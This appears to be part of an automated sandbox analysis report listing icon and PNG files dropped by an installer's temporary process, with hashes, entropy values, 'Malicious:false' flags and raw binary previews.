                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ......................................................................................................................................................................................................................................................................................................D...C...B..A...@...@...?...>...=...=...<...;...:...:...9...8...8...8...8...8...8...8...8...8..8...8.......................E...D..F...P...R"..V'..U&..T&..S%..S$..R$..Q#..P#..O"..N"..M!..M!..L ..K...J...I...H...F...C...@...9...8..8...................E...G...X'..X(..X(..W'..V'..U&..T%..S%..R$..R$..Q#..P#..O"..N"..M!..L ..L ..K...J...I...H...G...F...E...9...8...................F..S!..Z)..Y)..X(..W(..W'..V&..U&..T%..S%..R$..Q$..Q#..P#..O"..N!..M!..L ..K ..K...J...I...H...G...F...@...8...................G...V%..[*..Z)..Y)..X(..W'..V'..V&..U&..T%..S%..R$..Q$..g...X..X..X..X..X..X..X..g...I...H...G...C...8...................H...\+..[*..[*..Z)..Y)..X(..W(..W
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.4394112066038
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:JfMeD5/LLxul//e//O//5UtkRU3sovxWlDoq+ESjoHAICy:Jf5D5vxul//e//O//2tk6s00lx+Eqog0
                                                                                                                                                                                                                                                          MD5:539F181408594BE8AB8295972C4235BE
                                                                                                                                                                                                                                                          SHA1:692665445CF08589D98C943956CCFAF537B94C50
                                                                                                                                                                                                                                                          SHA-256:4DE87763921B6DC43B630BDEB41C7CFB81290DCBDA2E1F3E4B29ECE0A364EFF7
                                                                                                                                                                                                                                                          SHA-512:40E4FBF36D482EB2A1F21DA82973A06E209BBCB4FB90091B21BC750A0BF544F4825D54F269D785B18F6CC2708EE5CAE664A8E98197DB84AB210991C9A844E765
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..........................n...n...q...v...w...v...w...x...x...w...w...w...v...w...v...w...v...w...w...w...v...w...w...x...w...v...w...w...u...q...n...n...n...w.......{...y...y...x...z...z...y...y...y...w...x...x...z...y...x...y...y...x...x...x...y...x...z...x...z...{.......w...n...s.......t...r...r...s...r...r...s...s...r...r...r...r...r...q...s...q...s...s...s...s...r...t...s...s...r...r...r...r.......s...y.......s...r...t...s...u...u...s...s...t...u...u...u...t...s...s...s...u...u...s...u...t...t...s...t...t...s...t...u.......x...z.......w...v...v...u...u...w...v...v...u...v...u...v...w...v...u...t...u...u...u...v...w...u...u...v...u...v...u...v.......y...{.......v...w...v...v...w...x...v...x...w...x...w...u...v...u...w...u...u...u...v...x...v...w...v...v...x...x...x...w.......z...|.......x...y...y......................{...y....P...................O..x...x...z...y......................x...z...y.......{...|.......{...z...z......................z
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.433906899003064
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:FYv/RQcs//cF///cPG/////cP5Q//////cPQ////////ce///////cE4/////c3Q:uv/RdBmTBVlbaMeExLKwePaSO
                                                                                                                                                                                                                                                          MD5:5B44B02CBAC63F77EDFDB9C6B685AD91
                                                                                                                                                                                                                                                          SHA1:D8592C8C56F4E6DE68835268459472F24362A9CD
                                                                                                                                                                                                                                                          SHA-256:9CD7273F90F5F7C4BD2003695920A551B204A2F73690D6B0918323E2649DD15A
                                                                                                                                                                                                                                                          SHA-512:F0D33196CE43A5D599D271E1176A5A76FD09B271A3B44810CD9DE9310FE4EF57EA1D71918F6B596C1AB42755C890B61D5EF49EBDDE72D5AC879C137B497E83E6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................L]..LY.MY..........................................................................9../9..-8.2....O_..MY..MZ..MZ................................................................................................./9../9..-7..-8.2NY.XMZ..MZ..MZ...........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):2.907368134642011
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:WRkPCxmKeaeee6Sz1WDl2bbkVmB4g7mGpzSl:0xmKfSz18C+wQl
                                                                                                                                                                                                                                                          MD5:5738301E256B421DA693EFD4DC523727
                                                                                                                                                                                                                                                          SHA1:18C0624ED82BA03C8A1FBDB720F47DAEE5A694E3
                                                                                                                                                                                                                                                          SHA-256:67CD0A812DBCB3FAC6D87A01EF134D66937DA8166602854CB6FC01DA7A94388D
                                                                                                                                                                                                                                                          SHA-512:75E6B019DBBA805982A4168D17FEB46DFF8C832DA1BA0A6B3C131725FB0D0ECD598532576620A086867EE679486819FB0332F25597E9FC1B42454E846B3EC84D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ............................................................................................................................................................................................G.......................................................................5...............................................................U...........................................(...........................................................................................u...........................0...........................................................................]...............................}...........5...................................................................................:...........................................................................................................................................................................................................~..................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.977825738278547
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:hszWWWWWWWWWWWWWWWWWWWWWWWWWWWWxDrsAC/nqfyS:hszWWWWWWWWWWWWWWWWWWWWWWWWWWWWF
                                                                                                                                                                                                                                                          MD5:013FF196FE6FA64188221F539A0C75FA
                                                                                                                                                                                                                                                          SHA1:167852F22EEC0C7CD621ECB343DF0F05A855343E
                                                                                                                                                                                                                                                          SHA-256:27B388961D008A5B3085B27942F398021EC73D57549EA62EFF9D1D9542A8C4AD
                                                                                                                                                                                                                                                          SHA-512:046BE975703A10D75ED67D7C71EC87E63F2FD1CE8915521BD30629B6A4A06E3D10EA646B4ADE10F2D8ECC9297FB5165741E1AD4BDB961669CE66E19B80EBCE61
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................|...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...}...............y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y.......|...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...}...v...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...v...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...r...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...o...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...m...n...n...n...n...n...n...n...n...p.....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.506385614203068
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:8++kbjhMq1a9dJsg987jefKQ4N8tttttttttttttttttt6n:v+kbjhMgxjefKVl
                                                                                                                                                                                                                                                          MD5:7B60FEEE9EF0D5277330748C9E1592A3
                                                                                                                                                                                                                                                          SHA1:54DCE445A030CF59EFC15B1AB977EE6358BC02BC
                                                                                                                                                                                                                                                          SHA-256:8891B8CB9AD98FB86BEA6DD1D3D8717C997440CEE2519565A3D9B46133FDB5DC
                                                                                                                                                                                                                                                          SHA-512:915D4CD6C012DB9EC96257D4B1AD40367E1DE0940A22695547EA55DACBD2DB3FCD869556886013618A5F09053C6C8CBE97950E798794B1E681488FE98F52E84F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ....................................6-...Y>#.oO,.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.oO,.Y>#.-......6...............OzU-..R...R..|O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..|O...R...R.zU-....O.......%}W...P..vK..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..vK...P.}W.....%6#.w.~M..uH..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..uH..~M.6#.wsO(..xK..qF..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qF..xK.sO(..b4.tG..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..tG..b4.c5.qD..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..qD..c5.c5.pB..m@..l@..l@..l@..l@..k>..j=..j=..k
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):476
                                                                                                                                                                                                                                                          Entropy (8bit):7.439177858532215
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7iFaKslEOmLWhwS6ANwTrK7GqrOGZdM0Rtc:7aLlCWhP2fqrOLMtc
                                                                                                                                                                                                                                                          MD5:6591C6A99B1C83E8E82DFBC47DB14D09
                                                                                                                                                                                                                                                          SHA1:391F976F86FDA9E1DDA177B835E38BDEB4916F63
                                                                                                                                                                                                                                                          SHA-256:B6EECDBD6BE6362A75FD90B6E8B322EF64CAFCF9AB207411DAAA255C88E50572
                                                                                                                                                                                                                                                          SHA-512:D10B15A84A63C6C6BAAE451363C60DEC05C39BF7559CB26A205B800EAC5E40271DB17C3A49AA2BBC2FF25FF7FC2FB32AB7D0521BE071B18FFF91CF18DFC80C08
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....IDATX...+Cq....Y...$b\xO..R".z#g....BK.9..6.6.a.Vl...(/M..b.ll4g...su....{^.2..y.4I@.......k....Q...u..$..l.n....|....|)h...N..F...WUY..\.p0u0j.@.....0..n;,s%.I.,U.'..o...O.1.MM0...&...J\X./....S...x.......f...d....'_.O.r..A..m.[(..a'.#.?....Z.80.."...D.>.5.3.>...b.P|.T...'...i/l..B....A.:...<G!p...X. ......(.......*...T!..;.=.(......V..V...N...........B..n..W....h.0.po6.9.e.=+..$..@t..R|.).>>....~........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.673387955380768
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:Q0YV+XQJt9CeeTQLvNDg9m8nlVlurzJW37a5Mm9bYHEh:9YxCeQQ5DgM8nlVgr9W3emm9bYHEh
                                                                                                                                                                                                                                                          MD5:ECDF723831AEFF58D496FC70C8283BF6
                                                                                                                                                                                                                                                          SHA1:F4FAC6B07305CFB612625391FC50333071665167
                                                                                                                                                                                                                                                          SHA-256:97D0CF1DB2088A9D3EDDE44EF4BBE8731C82FE8539C89BB45A72E9F131BDCE19
                                                                                                                                                                                                                                                          SHA-512:B7FCDCF49BE8507950EFE02890BE516A99BACE7DAB1D6571DF4037C95011491944AE107EE5E507BFDAF342048264AA623E44AAE66824088333DC343051734866
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................6...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...6.......:...L...U...N...M...N...Q...T...X...]...b...f...j..!n.."q..#s..$s..#s.."q..!n...j...f...a...]...X...T...Q...N...N...U...L...:...:...X...F...@...?...?...B...E...I...N...S...W...[...^...b...c...c...c...a...^...[...V...R...M...I...E...B...?...@...F...X...:...;...U...D...A...@...@...A...C...F...J...M...P...S...V...X...Y...Z...Y...X...V...S...P...L...I...F...C...A...@...A...D...U...;...<...V...F...C...B...A...@...A...C...E...H...J...L...N...O...P...P...O...O...M...K...I...G...E...C...A...A...B...C...F...V...<...=...W...G...F...C...B...A...@...A...B...C...A...B...D...G...H...H...G...E...B...B...C...C...B...A...A...B...C...F...G...W...=...=...Y...I...G...F...D...C...B...A...B...>...5...1|..5...>...C...C...?...6...1|..5...?...B...A...B...C...D...F...G...I...Y...=...>...[...K...I...I...G...G...D...C...C...D
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.907302157036138
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:+BfZk7WDHWwgHz/8EKnha1Za+Wt4UhU6XkfAsq6BfyTLDJa8LaMahaavC:ykCrFEZ1k+Wt4UG54sqU6TJaoaMahaa
                                                                                                                                                                                                                                                          MD5:E6EB914C76409FE1F3D53E3C181CC9D9
                                                                                                                                                                                                                                                          SHA1:36A34D8F71B146A39A68F7C0AB02A566FCA24A85
                                                                                                                                                                                                                                                          SHA-256:060DFC41C4D3CCEFA3FD8E104302B42408DA7F54CA13096ED7836EF57C5B4D6D
                                                                                                                                                                                                                                                          SHA-512:7EA5748DF3C9229E166AC5578A23C56FEFC3E395A53D24305FB39D909F1F5ED5193A5F349824890C31D0AD90F7A6A574184A5E0E52C4BA83D868C71B94BB8B87
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................................................................................................................................................................................................................................................................[...................................................................................[...................................-..................................................................................................-......................................................................................................................................................[...........................................................................................................[.............................................................Q..'.....................*..................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.532691390134044
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:nY99Q99TqqeqQEqqeqQ4q0AqPwqKzj05pjskYoE6cCLa5v8XrimfI:vqqeqQEqqeqQ4q0AqPwqKzj05pjxzBaL
                                                                                                                                                                                                                                                          MD5:EA7CF6E021F69BF2044DC239F9875D65
                                                                                                                                                                                                                                                          SHA1:69699CA689463AC506D522CB95EA2507EE9D59F9
                                                                                                                                                                                                                                                          SHA-256:524AE1533708F5B47C73B4513662DAE775303FC2EF5D39B238D139C18864D24B
                                                                                                                                                                                                                                                          SHA-512:019AE06EA6F6CA327465EEBCBF54055CE833B5D5C1BB79AF89EE26351B088BB11E8E1E9544563FC663939D6D25DD2314BE208BDC0AFD6699741103E4C57CA090
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................................................................................................................................................................................................................................................................5y{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c...5y............../..4..:..A..J...S...\...f...p...w..............................y...o...c..Y..P..G..@..;..3..............3..<...B...C...C...E...J...J...J...J...J...E...C...C...C...C...D...I...J...J...J...J...I...C...C...C...C...B...?..0..........;...G...I...I...I...I...K...Q...Q...Q...Q...Q...L...I...I...I...I...J...P...Q...Q...Q...Q...P...J...I...I...H...A..5...........<...J...O...I...I...I...I...K...Q...Q...Q...Q...Q...L...I...I...I...I...J...P...Q...Q...Q...Q...P...J...I...I...B..3...........<...J...Q...O...I...I...I...I...K...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.4394112066038
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:JfMeD5/LLxul//e//O//5UtkRU3sovxWlDoq+ESjoHAICy:Jf5D5vxul//e//O//2tk6s00lx+Eqog0
                                                                                                                                                                                                                                                          MD5:539F181408594BE8AB8295972C4235BE
                                                                                                                                                                                                                                                          SHA1:692665445CF08589D98C943956CCFAF537B94C50
